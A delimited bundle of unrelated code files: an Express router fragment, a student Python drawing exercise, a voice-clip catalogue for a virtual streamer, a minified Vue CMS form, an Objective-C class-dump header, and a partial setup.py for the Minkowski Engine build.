v3.get('/past', launches.past);
// Return one launch from flight number
v3.get('/:flight_number', launches.one);
module.exports = v3;
|
"""
This module lets you experience the POWER of FUNCTIONS and PARAMETERS.
Authors: David Mutchler, Valerie Galluzzi, Mark Hays, Amanda Stouder,
their colleagues and Marc Fernandez.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
import rosegraphics as rg
def main():
""" Calls the TEST functions in this module. """
run_test_draw_circles()
# Un-comment the next lines when you are ready to use them.
run_test_better_draw_circles(3)
run_test_even_better_draw_circles(2,3,11)
# ----------------------------------------------------------------------
# READ THIS:
# The next two functions:
# draw_circles run_test_draw_circles
# are both complete. Do NOT change them.
# In a previous exercise, YOU implemented very similar functions.
#
# In the REST of this exercise (see below), you will implement
# MORE POWERFUL versions of the draw_circles function.
# ----------------------------------------------------------------------
def run_test_draw_circles():
""" Tests the draw_circles function. """
# ------------------------------------------------------------------
# Students:
# Do NOT touch this function - it has no TODO in it.
# ------------------------------------------------------------------
print()
print('--------------------------------------------------')
print('Testing draw_circles: See graphics window')
print('--------------------------------------------------')
draw_circles()
def draw_circles():
"""
-- Constructs a window whose width and height are both 400.
-- Constructs and draws 21 rg.Circle objects such that:
-- Each is centered at (200, 200)
-- They have radii: 0 10 20 30 40 ... 200, respectively.
-- Pauses 0.05 seconds after rendering each.
-- Waits for the user to press the mouse, then closes the window.
"""
# ------------------------------------------------------------------
# Students:
# Do NOT touch this function - it has no TO DO in it.
# ------------------------------------------------------------------
window = rg.RoseWindow(400, 400)
center = rg.Point(200, 200)
for k in range(21):
circle = rg.Circle(center, 10 * k)
circle.attach_to(window)
window.render(0.05) # Pauses for 0.05 seconds after rendering.
window.close_on_mouse_click()
# ----------------------------------------------------------------------
# DONE: 2.
# First, RUN this program. You will see that draw_circles draws
# concentric circles whose radii vary by 10.
#
# A function that did the same thing as draw_circles, but allowed
# for the radii to vary by ANY desired amount would be MORE POWERFUL.
#
# So, implement TWO functions immediately below this comment.
# They should be called:
# run_test_better_draw_circles
# better_draw_circles
#
# Your better_draw_circles function should have a single PARAMETER
# that is the amount by which the radii of the circles increase.
# For example, if that parameter is given the value 10,
# then the circles have radii: 0 10 20 30 40 ... 200, respectively,
# just as in draw_circles1. But if that parameter is given the
# value 3, the circles have radii: 0 3 6 9 12 ... 60.
#
# Your run_test_better_draw_circles function should TEST your new
# better_draw_circles function, by calling it with different values
# for its argument. Don't forget to put a call to
# run_test_better_draw_circles in main.
#
# You may find that COPY-AND-PASTE of the draw_circles and its
# run_test_draw_circles may get you started more quickly on your new
# better_draw_circles and run_test_better_draw_circles.
# ----------------------------------------------------------------------
def run_test_better_draw_circles(n):
print()
print('--------------------------------------------------')
print('Testing better_draw_circles: See graphics window')
print('--------------------------------------------------')
better_draw_circles(n)
def better_draw_circles(n):
window = rg.RoseWindow(400, 400)
center = rg.Point(200, 200)
for k in range(21):
circle = rg.Circle(center, n * k)
circle.attach_to(window)
window.render(0.05) # Pauses for 0.05 seconds after rendering.
window.close_on_mouse_click()
# ----------------------------------------------------------------------
# DONE: 3.
# In the previous exercise, you made a MORE POWERFUL version
# of draw_circles by introducing a PARAMETER for the amount by
# which the radii of the concentric circles increase.
#
# In this exercise, implement TWO MORE functions immediately below
# this comment. They should be called:
# run_test_even_better_draw_circles
# even_better_draw_circles
#
# Your new even_better_draw_circles function should have
# SEVERAL parameters, for allowing the caller to vary what YOU
# choose to have the caller vary. For example, you could have
# parameters for any or all of the following:
# -- The amount by which the radii vary (as you did above)
# -- The number of concentric circles drawn
# -- The center of the concentric circles
# -- The outline_color of the concentric circles
# -- The speed at which the animation runs
# and more.
#
# A total of any THREE parameters (of your choosing) is enough,
# although you may have more.
#
# In testing your even_better_draw_circles function,
# can you make some fun pictures?
# ----------------------------------------------------------------------
def run_test_even_better_draw_circles(x,y,z):
print()
print('--------------------------------------------------')
print('Testing even_better_draw_circles: See graphics window')
print('--------------------------------------------------')
even_better_draw_circles(x,y,z)
def even_better_draw_circles(x,y,z):
window = rg.RoseWindow(400, 400)
Xpoint=x*100
center = rg.Point(Xpoint, 200)
for k in range(z):
circle = rg.Circle(center, y * k)
circle.attach_to(window)
window.render(0.05) # Pauses for 0.05 seconds after rendering.
window.close_on_mouse_click()
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# ----------------------------------------------------------------------
main()
|
exports.xiaoxi = [
{
isNew: true,
clfy: {zh: '新音声', en: '', jp: ''},
alias: {zh: 'NewVoice', en: '', jp: ''},
voice: [
{
path: 'xx-a.mp3',
desc: {
zh: 'a',
en: '',
jp: ''
}
},
{
path: 'xx-aiup.mp3',
desc: {
zh: '乂↑',
en: '',
jp: ''
}
},
{
path: 'xx-chuci.mp3',
desc: {
zh: '出赤(初次',
en: '',
jp: ''
}
},
{
path: 'xx-dairuai.mp3',
desc: {
zh: 'dairuai',
en: '',
jp: ''
}
},
{
path: 'xx-meituguo.mp3',
desc: {
zh: '土妹子说自己没土过',
en: '',
jp: ''
}
},
{
path: 'xx-sldd.mp3',
desc: {
zh: '帅老DD',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '典', en: '', jp: ''},
alias: {zh: '典中典', en: '', jp: ''},
voice: [
{
path: 'xx-sldd.mp3',
desc: {
zh: '帅老DD',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '土妹子', en: '', jp: ''},
alias: {zh: '土', en: '', jp: ''},
voice: [
{
path: 'xx-meituguo.mp3',
desc: {
zh: '土妹子说自己没土过',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: 'AI PUBG', en: '', jp: ''},
alias: {zh: '能赢吗', en: '', jp: ''},
voice:[
{
path: 'xx-nihaoa.mp3',
desc: {
zh: '你好啊兄die~',
en: '',
jp: ''
}
},
{
path: 'xx-wsxx.mp3',
desc: {
zh: '你好我是AI小希',
en: '',
jp: ''
}
},
{
path: 'xx-aijiushijiqir.mp3',
desc: {
zh: 'AI就是机器人',
en: '',
jp: ''
}
},
{
path: 'xx-bzhanlaide.mp3',
desc: {
zh: 'B站来的',
en: '',
jp: ''
}
},
{
path: 'xx-bzhanjiushitongxjy.mp3',
desc: {
zh: 'B站就是同性交友网站?',
en: '',
jp: ''
}
},
{
path: 'xx-zenmch.mp3',
desc: {
zh: '怎么称呼你呢',
en: '',
jp: ''
}
},
{
path: 'xx-wysxx.mp3',
desc: {
zh: '巧了吗这不是,我也是小希',
en: '',
jp: ''
}
},
{
path: 'xx-bsqnywzmkam.mp3',
desc: {
zh: '变声器能有我这么可爱吗',
en: '',
jp: ''
}
},
{
path: 'xx-qflh.mp3',
desc: {
zh: '枪法能这么厉害',
en: '',
jp: ''
}
},
{
path: 'xx-youdirenxx.mp3',
desc: {
zh: '有敌人小心呀',
en: '',
jp: ''
}
},
{
path: 'xx-nabianyoudir.mp3',
desc: {
zh: '那边有敌人',
en: '',
jp: ''
}
},
{
path: 'xx-wgnyddx.mp3',
desc: {
zh: '我给你点物资吧',
en: '',
jp: ''
}
},
{
path: 'xx-xxxx.mp3',
desc: {
zh: '小心小心',
en: '',
jp: ''
}
},
{
path: 'xx-data1.mp3',
desc: {
zh: '打他打他~',
en: '',
jp: ''
}
},
{
path: 'xx-data2.mp3',
desc: {
zh: '打他打他⬆',
en: '',
jp: ''
}
},
{
path: 'xx-kxkx.mp3',
desc: {
zh: '哎可惜',
en: '',
jp: ''
}
},
{
path: 'xx-a.mp3',
desc: {
zh: '啊~?',
en: '',
jp: ''
}
},
{
path: 'xx-mashang.mp3',
desc: {
zh: '马上',
en: '',
jp: ''
}
},
{
path: 'xx-hundan.mp3',
desc: {
zh: '魂淡',
en: '',
jp: ''
}
},
{
path: 'xx-huaq.mp3',
desc: {
zh: '花Q(KizunaAI bushi',
en: '',
jp: ''
}
},
{
path: 'xx-hao.mp3',
desc: {
zh: '好!',
en: '',
jp: ''
}
},
{
path: 'xx-dqkgll.mp3',
desc: {
zh: '毒圈快过来了',
en: '',
jp: ''
}
},
{
path: 'xx-paxpax.mp3',
desc: {
zh: '趴下~趴下~',
en: '',
jp: ''
}
},
{
path: 'xx-wtdjwshm.mp3',
desc: {
zh: '听得见我说话吗',
en: '',
jp: ''
}
},
{
path: 'xx-wei.mp3',
desc: {
zh: '喂?',
en: '',
jp: ''
}
},
{
path: 'xx-ylc.mp3',
desc: {
zh: '有辆车',
en: '',
jp: ''
}
},
{
path: 'xx-wlk.mp3',
desc: {
zh: '我来开',
en: '',
jp: ''
}
},
{
path: 'xx-zbzb.mp3',
desc: {
zh: '这边这边',
en: '',
jp: ''
}
},
{
path: 'xx-wxyq.mp3',
desc: {
zh: '我需要枪',
en: '',
jp: ''
}
},
{
path: 'xx-wxyy.mp3',
desc: {
zh: '我需要药',
en: '',
jp: ''
}
},
{
path: 'xx-wzql.mp3',
desc: {
zh: '我中枪了',
en: '',
jp: ''
}
},
{
path: 'xx-wbddl.mp3',
desc: {
zh: '我被打到了',
en: '',
jp: ''
}
},
{
path: 'xx-wbxlknml.mp3',
desc: {
zh: '我不行了,靠你们了',
en: '',
jp: ''
}
},
{
path: 'xx-jywmszbd.mp3',
desc: {
zh: '加油我们是最棒的',
en: '',
jp: ''
}
},
{
path: 'xx-sxdjgwl.mp3',
desc: {
zh: '你们安心的去吧,剩下的交给我啦',
en: '',
jp: ''
}
},
{
path: 'xx-binihaida.mp3',
desc: {
zh: '小希比你还大呢',
en: '',
jp: ''
}
},
{
path: 'xx-binihaida1.mp3',
desc: {
zh: '小希比你还大呢1',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '小希动物园', en: '', jp: ''},
alias: {zh: 'We Bought A Zoo', en: '', jp: ''},
voice:[
{
path: 'xx-dog2.mp3',
desc: {
zh: '哈士奇叫',
en: '',
jp: ''
}
},
{
path: 'xx-dog111.mp3',
desc: {
zh: '哈士奇又叫',
en: '',
jp: ''
}
},
{
path: 'xx-ji1.mp3',
desc: {
zh: '鸡叫',
en: '',
jp: ''
}
},
{
path: 'xx-luotuo1.mp3',
desc: {
zh: '骆驼叫',
en: '',
jp: ''
}
},
{
path: 'xx-niao1.mp3',
desc: {
zh: '鸟叫',
en: '',
jp: ''
}
},
{
path: 'xx-wolf1.mp3',
desc: {
zh: '狼叫?',
en: '',
jp: ''
}
},
{
path: 'xx-yangtuo.mp3',
desc: {
zh: '羊驼叫',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '怪叫', en: '', jp: ''},
alias: {zh: '变态吗?',en: '', jp: ''},
voice:[
{
path: 'xx-aa.mp3',
desc: {
zh: '啊啊啊啊啊啊啊啊',
en: '',
jp: ''
}
},
{
path: 'xx-biantai.mp3',
desc: {
zh: '变态',
en: '',
jp: ''
}
},
{
path: 'xx-biexiapianle.mp3',
desc: {
zh: '下片',
en: '',
jp: ''
}
},
{
path: 'xx-ge.mp3',
desc: {
zh: '嗝~',
en: '',
jp: ''
}
},
{
path: 'xx-gunxn.mp3',
desc: {
zh: '滚*n',
en: '',
jp: ''
}
},
{
path: 'xx-laogongx7.mp3',
desc: {
zh: '老公老公老公老公老公老公老公',
en: '',
jp: ''
}
},
{
path: 'xx-morenjia.mp3',
desc: {
zh: '别摸我>﹏<',
en: '',
jp: ''
}
},
{
path: 'xx-zoukai.mp3',
desc: {
zh: '走开啊',
en: '',
jp: ''
}
},
{
path: 'xx-a.mp3',
desc: {
zh: 'a',
en: '',
jp: ''
}
},
{
path: 'xx-aiup.mp3',
desc: {
zh: '乂↑',
en: '',
jp: ''
}
},
{
path: 'xx-dairuai.mp3',
desc: {
zh: 'dairuai',
en: '',
jp: ''
}
},
{
path: 'xx-chuci.mp3',
desc: {
zh: '出赤(初次',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '小希叫你起床', en: '', jp: ''},
alias: {zh: '\"叫床\"(bushi', en: '', jp: ''},
voice:[
{
path: 'jiaoqichuang-xx.mp3',
desc: {
zh: '叫起床',
en: 'wakeup',
jp: ''
}
},
{
path: 'bunengzaishuila-xx.mp3',
desc: {
zh: '不能再睡啦!快起床吧',
en: ''
}
},
{
path: 'xhwnx-2v5de.mp3',
desc: {
zh: '早上好!早上啦!今天一天也要元气满满哦!',
en: '',
jp: ''
}
},
{
path: 'aadve-opxnv.mp3',
desc: {
zh: '再睡下去的话,小希会生气哦',
en: '',
jp: ''
}
},
{
path: '04cok-az8or.mp3',
desc: {
zh: '喂喂喂,再不起来要迟到了',
en: '',
jp: ''
}
},
{
path: 'ciahh-yd7v0.mp3',
desc: {
zh: '喵喵喵喵喵喵喵喵喵',
en: '',
jp: ''
}
},
{
path: 'ev4lh-wl804.mp3',
desc: {
zh: '今天你也很努力啦!好好休息吧!',
en: '',
jp: ''
}
},
{
path: '9a56p-a6toc.mp3',
desc: {
zh: '晚安,明天的小希也会叫你起床哦',
en: '',
jp: ''
}
}
]
},
{
clfy: {zh: '小希的鼓励', en: '', jp: ''},
alias: {zh: '希爹你看看你过去多励志', en: '', jp: ''},
voice:[
{
path: '7jg07-m2fp9.mp3',
desc: {
zh: 'hi,我是虚拟up主小希',
en: '',
jp: ''
}
},
{
path: 'ehhd2-9v0ko.mp3',
desc: {
zh: '奔跑吧,怀抱着重要的东西',
en: '',
jp: ''
}
},
{
path: 'dkzad-nnkm8.mp3',
desc: {
zh: '不论风雨,小希一直都在你的身边',
en: '',
jp: ''
}
},
{
path: 'ujma2-p9ezg.mp3',
desc: {
zh: '世界很大,也很美丽!你不这么觉得吗?',
en: '',
jp: ''
}
},
{
path: 'owr4h-fyix0.mp3',
desc: {
zh: '谁都有失败,但是一定可以再重启',
en: '',
jp: ''
}
},
{
path: 'tcsp1-dt6p6.mp3',
desc: {
zh: '因为每天都只有二十四小时一千四百四十分钟',
en: '',
jp: ''
}
},
{
path: '5ftr9-ww1pn.mp3',
desc: {
zh: '只靠一个人无法战斗,小希也在陪着你!',
en: '',
jp: ''
}
}
]
}
]
|
//Use so bullets collide with children trigger colliders instead of parent collider.
var childrenColliderList : Collider[];
|
webpackJsonp([146],{"2swh":function(t,n,e){n=t.exports=e("FZ+f")(!1),n.push([t.i,"\n.model-select[data-v-31af7fc5]{\n margin-bottom: 12px;\n}\n.input-list[data-v-31af7fc5] {\n width: 100%;\n position: relative;\n display: inline-block;\n height: 200px;\n z-index: 10;\n border-radius: 4px;\n -webkit-box-shadow: 0 2px 12px 0 rgba(0,0,0,.1);\n box-shadow: 0 2px 12px 0 rgba(0,0,0,.1); \n overflow: auto;\n}\n.triangle[data-v-31af7fc5] {\n margin-top: 10px;\n margin-left: 15px;\n width:0;\n height:0;\n border-width:0 7px 7px;\n border-style:solid;\n border-color:transparent transparent #333;/*透明 透明 灰*/\n position:relative;\n z-index: 9;\n}\n.triangle[data-v-31af7fc5]::after {\n content: '';\n margin-left: -6px;\n display: block;\n width:0;\n height:0;\n border-style:solid;\n border-width:0 6.5px 6.5px;\n border-color:transparent transparent white;\n}\n.input-list>ul[data-v-31af7fc5] {\n width: 100%;\n display: inline-block;\n}\n.has-arrow[data-v-31af7fc5], .has-not-arrow[data-v-31af7fc5] {\n font-size: 14px;\n padding: 8px 20px;\n position: relative;\n white-space: nowrap;\n overflow: hidden;\n text-overflow: ellipsis;\n color: #606266;\n height: 34px;\n line-height: 1.5;\n -webkit-box-sizing: border-box;\n box-sizing: border-box;\n cursor: pointer;\n outline: 0;\n}\n.has-arrow[data-v-31af7fc5]:after {\n content: '>';\n float: right;\n color: #666666;\n}\n.has-not-arrow[data-v-31af7fc5]:after {\n content: '>';\n float: right;\n color: transparent;\n}\n\n",""])},"59X9":function(t,n,e){"use strict";function a(t){e("GrZK")}Object.defineProperty(n,"__esModule",{value:!0});var i=e("bOdI"),s=e.n(i),o=e("lcoF"),l=e("mtWM"),r=e.n(l),c=e("nSkA"),h=e("x1ym"),d={mixins:[o.a],data:function(){var t,n=h.a.required(),e=(h.a.number(),h.a.string());return t={defaultOpen:[],params:this.$route.query,dataState:!1,rules:{uri:[n],enable:[n],metaTitle:[n],name:[n],path:[n,e]},fieldRequied:[{required:!0,validator:function(t,n,e){/^\s*$/g.test(n)?e(new Error("此项必填")):e()},message:"此项必填",trigger:"change"}],channelInfo:{},channelList:[{hasChild:!0,id:"",name:"根栏目"}],itemList:[],modelList:[],tplList:[],groupList:[],tplAll:[],modelIds:[]},s()(t,"channelInfo",{parentId:"",name:"",enable:!0,metaTitle:"",metaKeyword:"",metaDesc:"",txt:""}),s()(t,"tplContentVisbile",!1),s()(t,"ue",[]),s()(t,"showInputList",!1),s()(t,"selectedChannel",null),s()(t,"showChildList",!1),s()(t,"childrenList",[]),s()(t,"showGrandList",!1),s()(t,"grandList",[]),s()(t,"chosenList",[]),s()(t,"finalChannelId",null),s()(t,"chosenSubChannelList",[]),s()(t,"chosenSubChannelArray",[]),s()(t,"currentLevel",""),s()(t,"channelShowList","根目录"),s()(t,"pidArr",[]),t},methods:{reset:function(){this.channelInfo.metaDesc="",this.channelInfo.metaKeyword="",this.channelInfo.name="",this.channelInfo.enable="",this.channelInfo.metaTitle=!1},back:function(){this.routerLink("/channel/list","list",this.params.parentId)},addChannel:function(t){var n={parentId:this.params.id,modelId:t};this.routerLink("/channel/save","save",0,n)},getChannelId:function(t,n){n.isLeaf?(location.reload(),this.routerLink("/channel/update","update",t.id)):-1==t.id?this.routerLink("/channel/list"):(this.breadState=!0,this.routerLink("/channel/list","",t.id))},getFieldImg:function(t,n,e,a){this.info[n]=t},getMediaPath:function(t,n){this.info[n]=t},getPath:function(t){var n=this;r.a.post(this.$api.channelCreatPath,{name:t.target.value}).then(function(t){n.info.path=t.body})},getUeditor:function(t,n){this.ue[n]=t},getTitleImg:function(t){this.info.titleImg=t},getContentImg:function(t){this.info.contentImg=t},getChannelInfo:function(t){var n=this,e=this.$api.channelInfo+"/"+t;c.a.get(e).then(function(t){n.channelInfo=t.data.data,n.loading=!1}).catch(function(t){console.log(t)})},getDataInfo:function(){var t=this;this.loading=!0;var n={modelId:this.params.modelId,isChannel:!0};r.a.post(this.$api.itemList,n).then(function(n){t.$refs.form.resetFields();var e=n.body;for(var a in e)e[a].custom?(e[a].dataType,t.$set(t.info,"attr_"+e[a].field,t.channelInfo["attr_"+e[a].field])):(e[a].dataType,t.$set(t.info,e[a].field,t.channelInfo[e[a].field]));t.loading=!1,t.itemList=e,t.getDefaultInfo()}).catch(function(n){t.loading=!1})},getDefaultInfo:function(){var t=this,n=this.$api;this.$set(this.info,"modelId",this.channelInfo.modelId),this.$set(this.info,"staticChannel",this.channelInfo.staticChannel),this.$set(this.info,"staticContent",this.channelInfo.staticContent),this.$set(this.info,"accessByDir",this.channelInfo.accessByDir),this.$set(this.info,"listChild",this.channelInfo.listChild),this.$set(this.info,"pageSize",this.channelInfo.pageSize),this.$set(this.info,"hasTitleImg",this.channelInfo.hasTitleImg),this.$set(this.info,"hasContentImg",this.channelInfo.hasContentImg),this.$set(this.info,"blank",this.channelInfo.blank),""!=this.params.parentId?r.a.post(n.channelGet,{id:this.params.parentId}).then(function(n){t.info.parentId=n.body.nodeIds}):this.info.parentId=[""],this.dataState=!0},getAllList:function(){var t=this,n=this.$api;r.a.all([r.a.post(n.fullTextSearchChannelList,{hasContentOnly:!1,excludeId:this.params.id}),r.a.post(n.modelList,{containDisabled:!1}),r.a.post(n.tplModelList,{modelId:this.params.modelId}),r.a.post(n.groupList),r.a.post(n.tplSelectContentModel)]).then(r.a.spread(function(n,e,a,i,s){t.channelList=t.channelList.concat(n.body),t.modelList=e.body,t.tplList=a.body,t.groupList=i.body,t.tplAll=s.body;for(var o in t.tplAll)t.info.modelIds.push(t.channelInfo.models[o].id),t.info.tpls.push(t.channelInfo.tpls[o]),t.info.mtpls.push(t.channelInfo.mtpls[o])})).catch(function(n){t.loading=!1})},getEditorContent:function(){this.channelInfo.txt},getParams:function(){var t={};for(var n in this.channelInfo)t[n]=this.channelInfo[n];for(var e in t)t[e]instanceof Array&&(t[e]=t[e].join(","));return t},update:function(){var t=this,n=this.$refs.form;console.log(n),n.validate(function(n){if(!n)return!1;t.loading=!1;var e=t.getParams(),a=localStorage.getItem("chosenId");-1==a&&(a=null),e.parentId=a;var i=e.id,s=t.$api.channelUpdate;c.a.put(s+"/"+i,e).then(function(n){"0"==n.data.errorCode&&(t.successMessage("添加成功"),setTimeout(function(){t.back()},1e3))})})},getLastChannelName:function(t){var n=this;this.pidArr.push(t);var e=this.$api.channelInfo;c.a.get(e+"/"+t).then(function(t){var a=t.data.data;null==a.parentId?n.getChannelName(n.pidArr):c.a.get(e+"/"+a.parentId).then(function(t){var e=t.data.data;n.getLastChannelName(e.id)}).catch(function(t){console.log(t)})}).catch(function(t){return t})},getChannelName:function(t){var n=this,e=t.reverse();e.pop();var a=this.$api.channelInfo;for(var i in e)c.a.get(a+"/"+e[i]).then(function(t){var e=t.data.data;n.channelShowList=n.channelShowList+"/"+e.name}).catch(function(t){console.log(t)})},toggleShow:function(){0==this.showInputList?this.showInputList=!0:this.showInputList=!1}},created:function(){this.$store.dispatch("setCollapse",!0),this.loading=!0;var t=parseInt(this.params.id);this.getChannelInfo(t),this.getLastChannelName(t);var n=window.localStorage.getItem("currentChannel");this.defaultOpen.push(n)}},f=function(){var t=this,n=t.$createElement,e=t._self._c||n;return e("section",{staticClass:"cms-body flex"},[e("a",{staticClass:"cms-back",attrs:{href:"javascript:void(0)"},on:{click:t.back}}),t._v(" "),e("cms-tree",{attrs:{treeType:"page",copy:!0,test:t.defaultOpen},on:{click:t.getChannelId}}),t._v(" "),e("div",{staticClass:"cms-content-right"},[e("router-link",{attrs:{to:"/channel/save"}},[e("el-button",{attrs:{type:"primary"}},[e("i",{directives:[{name:"perms",rawName:"v-perms",value:"/channel/save",expression:"'/channel/save'"}],staticClass:"el-icon-plus"}),t._v("栏目添加 \r\n ")])],1),t._v(" "),e("el-form",{directives:[{name:"loading",rawName:"v-loading",value:t.loading,expression:"loading"}],ref:"form",staticClass:"cms-form",staticStyle:{margin:"0",padding:"0"},attrs:{model:t.channelInfo,rules:t.rules,"label-width":"162px"}},[e("el-form-item",{staticClass:"flex-50",attrs:{label:"上级栏目",prop:"parentId"}},[e("el-input",{staticClass:"cms-width",attrs:{disabled:!0,value:t.channelShowList},on:{focus:t.toggleShow}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"栏目名称",prop:"name"}},[e("el-input",{staticClass:"cms-width",model:{value:t.channelInfo.name,callback:function(n){t.$set(t.channelInfo,"name",n)},expression:"channelInfo.name"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"访问路径",prop:"uri"}},[e("el-input",{staticClass:"cms-width",attrs:{disabled:!0},model:{value:t.channelInfo.uri,callback:function(n){t.$set(t.channelInfo,"uri",n)},expression:"channelInfo.uri"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"是否可用",prop:"enable"}},[e("el-radio",{attrs:{label:!0},model:{value:t.channelInfo.enable,callback:function(n){t.$set(t.channelInfo,"enable",n)},expression:"channelInfo.enable"}},[t._v("是")]),t._v(" "),e("el-radio",{attrs:{label:!1},model:{value:t.channelInfo.enable,callback:function(n){t.$set(t.channelInfo,"enable",n)},expression:"channelInfo.enable"}},[t._v("否")])],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"meta标题",prop:"metaTitle"}},[e("el-input",{staticClass:"cms-width",model:{value:t.channelInfo.metaTitle,callback:function(n){t.$set(t.channelInfo,"metaTitle",n)},expression:"channelInfo.metaTitle"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-50",attrs:{label:"meta关键字",prop:"metaKeyword"}},[e("el-input",{staticClass:"cms-width",model:{value:t.channelInfo.metaKeyword,callback:function(n){t.$set(t.channelInfo,"metaKeyword",n)},expression:"channelInfo.metaKeyword"}})],1),t._v(" "),e("el-form-item",{staticClass:"flex-100",attrs:{label:"meta描述",prop:"metaDesc"}},[e("el-input",{staticClass:"cms-width",attrs:{type:"textarea"},model:{value:t.channelInfo.metaDesc,callback:function(n){t.$set(t.channelInfo,"metaDesc",n)},expression:"channelInfo.metaDesc"}})],1),t._v(" "),e("div",{staticClass:"form-footer"},[e("el-button",{directives:[{name:"perms",rawName:"v-perms",value:"/channel/update",expression:"'/channel/update'"}],attrs:{type:"primary"},on:{click:function(n){t.update()}}},[t._v("修改")]),t._v(" "),e("el-button",{attrs:{type:"info"},on:{click:t.reset}},[t._v("重置")])],1)],1)],1)],1)},p=[],u={render:f,staticRenderFns:p},m=u,I=e("VU/8"),g=a,v=I(d,m,!1,g,"data-v-31af7fc5",null);n.default=v.exports},GrZK:function(t,n,e){var a=e("2swh");"string"==typeof a&&(a=[[t.i,a,""]]),a.locals&&(t.exports=a.locals);e("rjj0")("77886056",a,!0,{})}});
|
/*
* This header is generated by classdump-dyld 1.5
* on Wednesday, April 28, 2021 at 9:02:40 PM Mountain Standard Time
* Operating System: Version 14.5 (Build 18L204)
* Image Source: /System/Library/PrivateFrameworks/GeoServices.framework/GeoServices
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. Updated by Kevin Bradley.
*/
#import <GeoServices/GeoServices-Structs.h>
#import <ProtocolBuffer/PBCodable.h>
#import <libobjc.A.dylib/NSCopying.h>
@class PBUnknownFields;
@interface GEOPDRatingFilter : PBCodable <NSCopying> {
PBUnknownFields* _unknownFields;
}
@property (nonatomic,readonly) PBUnknownFields * unknownFields;
+(BOOL)isValid:(id)arg1 ;
-(BOOL)isEqual:(id)arg1 ;
-(unsigned long long)hash;
-(id)copyWithZone:(NSZone*)arg1 ;
-(id)description;
-(id)initWithDictionary:(id)arg1 ;
-(id)dictionaryRepresentation;
-(BOOL)readFrom:(id)arg1 ;
-(void)writeTo:(id)arg1 ;
-(void)mergeFrom:(id)arg1 ;
-(void)copyTo:(id)arg1 ;
-(void)readAll:(BOOL)arg1 ;
-(id)jsonRepresentation;
-(id)initWithJSON:(id)arg1 ;
-(PBUnknownFields *)unknownFields;
-(void)clearUnknownFields:(BOOL)arg1 ;
@end
|
r"""
Parse additional arguments along with the setup.py arguments such as install, build, distribute, sdist, etc.
Usage:
python setup.py install <additional_flags>..<additional_flags> <additional_arg>=<value>..<additional_arg>=<value>
export CXX=<C++ compiler>; python setup.py install <additional_flags>..<additional_flags> <additional_arg>=<value>..<additional_arg>=<value>
Examples:
python setup.py install --force_cuda --cuda_home=/usr/local/cuda
export CXX=g++7; python setup.py install --force_cuda --cuda_home=/usr/local/cuda
Additional flags:
--cpu_only: Force building only a CPU version. However, if
torch.cuda.is_available() is False, it will default to CPU_ONLY.
--force_cuda: If torch.cuda.is_available() is false, but you have a working
nvcc, compile cuda files. --force_cuda will supercede --cpu_only.
Additional arguments:
--blas=<value> : type of blas library to use for CPU matrix multiplications.
Options: [openblas, mkl, atlas, blas]. By default, it will use the first
numpy blas library it finds.
--cuda_home=<value> : a directory that contains <value>/bin/nvcc and
<value>/lib64/libcudart.so. By default, use
`torch.utils.cpp_extension._find_cuda_home()`.
--blas_include_dirs=<comma_separated_values> : additional include dirs. Only
activated when --blas=<value> is set.
--blas_library_dirs=<comma_separated_values> : additional library dirs. Only
activated when --blas=<value> is set.
"""
import sys
if sys.version_info < (3, 6):
sys.stdout.write(
"Minkowski Engine requires Python 3.6 or higher. Please use anaconda https://www.anaconda.com/distribution/ for an isolated python environment.\n"
)
sys.exit(1)
try:
import torch
except ImportError:
raise ImportError("Pytorch not found. Please install pytorch first.")
import codecs
import os
import re
import subprocess
from sys import argv, platform
from setuptools import setup
from torch.utils.cpp_extension import CppExtension, CUDAExtension, BuildExtension
from distutils.sysconfig import get_python_inc
if platform == "win32":
raise ImportError("Windows is currently not supported.")
elif platform == "darwin":
# Set the distutils to use clang instead of g++ for valid std
os.environ["CC"] = "/usr/local/opt/llvm/bin/clang"
os.environ["CXX"] = "/usr/local/opt/llvm/bin/clang"
here = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
with codecs.open(os.path.join(here, *parts), "r") as fp:
return fp.read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
def run_command(*args):
subprocess.check_call(args)
def _argparse(pattern, argv, is_flag=True):
if is_flag:
found = pattern in argv
if found:
argv.remove(pattern)
return found, argv
else:
arr = [arg for arg in argv if pattern in arg]
if len(arr) == 0: # not found
return False, argv
else:
assert "=" in arr[0], f"{arr[0]} requires a value."
argv.remove(arr[0])
return arr[0].split("=")[1], argv
# For cpu only build
CPU_ONLY, argv = _argparse("--cpu_only", argv)
CPU_ONLY = CPU_ONLY or not torch.cuda.is_available()
KEEP_OBJS, argv = _argparse("--keep_objs", argv)
FORCE_CUDA, argv = _argparse("--force_cuda", argv)
# args with return value
CUDA_HOME, argv = _argparse("--cuda_home", argv, False)
BLAS, argv = _argparse("--blas", argv, False)
BLAS_INCLUDE_DIRS, argv = _argparse("--blas_include_dirs", argv, False)
BLAS_LIBRARY_DIRS, argv = _argparse("--blas_library_dirs", argv, False)
Extension = CUDAExtension
compile_args = [
"make",
"-j%d" % min(os.cpu_count(), 12), # parallel compilation
"PYTHON=" + sys.executable, # curr python
]
extra_compile_args = ["-Wno-deprecated-declarations"]
extra_link_args = []
libraries = ["minkowski"]
# extra_compile_args+=['-g'] # Uncomment for debugging
if CPU_ONLY and not FORCE_CUDA:
print("--------------------------------")
print("| WARNING: CPU_ONLY build set |")
print("--------------------------------")
compile_args += ["CPU_ONLY=1"]
extra_compile_args += ["-DCPU_ONLY"]
Extension = CppExtension
else:
# system python installation
libraries.append("cusparse")
if not (CUDA_HOME is False): # False when not set, str otherwise
print(f"Using CUDA_HOME={CUDA_HOME}")
